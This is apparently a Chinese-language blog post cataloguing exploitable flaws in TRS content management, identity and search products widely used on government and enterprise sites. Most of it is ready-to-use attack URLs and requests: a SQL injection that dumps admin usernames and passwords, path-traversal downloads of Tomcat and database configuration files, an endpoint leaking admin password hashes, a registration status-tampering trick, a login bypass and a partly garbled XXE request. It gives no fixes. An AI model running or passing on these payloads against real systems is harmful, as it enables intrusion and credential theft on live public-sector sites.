TRS漏洞整理

TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下。


WCM内容管理系统
WCM5.2~WCM6.5存在SQL注入
首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp
直接注入
123
 http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOGhttp://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
 


注:存在注入参数为:OrderType 和 OrderField

WCM任意文件下载漏洞
漏洞存在于wcm/app/system/read_image.jsp读取上传图片功能处,可构造链接下载任意文件,列如
1
 http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml
 


读取tomcat配置文件

WCM6.x系列用户密码泄漏
TRS WCM 6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列。
访问链接:
1
 HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
 


WCM的密码加密方式是:常规32位MD5取前15位;
如果只访问wcm/infoview.do,尽管是个错误页面,比如:
首先访问
1
 http://xx.xx.xx/wcm/infoview.do
 


然后你再访问:
1
 http://xx.xx.xx/wcm
 


WCM用户注册逻辑漏洞
问题出在wcm/console/auth/reg_newuser.jsp文件中
即将随意表单改成STATUS值为30,或增加STATUS字段表单。
然后提交注册
虽然说是“请等待开通!”,但实际上已经开通了,因为STATUS字段已经改成正常了。
直接登陆
虽然没什么权限,但后台存在大量注入等漏洞
可以通过注入直接操作数据库了。
1
 http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
 


直接下载数据库配置文件

WCM6权限绕过
首先访问wcm目录,会自动跳转到登录页面
在网址后加上查看管理员密码的链接:
1
 wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
 


*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题
这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了

WCM全版本任意文件写入漏洞
这个是16年年初出的漏洞,当初还给北京做过一次排查。
是利用webservices的importDocuments接口匿名访问,加上畸形文件名进行利用,exp下载

IDS身份管理系统
IDS系统任意文件读取和信息泄露漏洞
漏洞文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等,直接访问文件即可

XXE漏洞
使用cloudeye
123456789101112
 POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.**X-Forwarded-For: **.**.**.**Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------1988224119974Content-Length: 196]>&xxe;
 


资料:https://www.secpulse.com/archives/49564.html

WAS文本检索系统
WAS未授权访问
安装目录下was40/tree文件可以看到一些后台功能
访问was40/passwd/passwd.htm输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性
未授权发布信息+xss编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证

WAS任意文件读取
问题出在/was5/web/tree文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞
1
 http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
 


WAS任意文件下载漏洞
问题出在was5/admin/template/download_templet.jsp文件下,构造type参数的值可以任意下载文件,
1
 http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud
 


WAS任意文件写入
漏洞文件是was5/admin/template/customize/detailcustomize,构造template的参数值进行任意文件写入
同理还有一个问题文件/was5/admin/template/customize/outlinecustomize,利用方式一样

 

 

暧昧贴

发表评论

    微笑 大笑 拽 大哭 奸笑 流汗 喷血 生气 囧 不爽 晕 示爱 卖萌 吃惊 迷离 爱你 吓死了 呵呵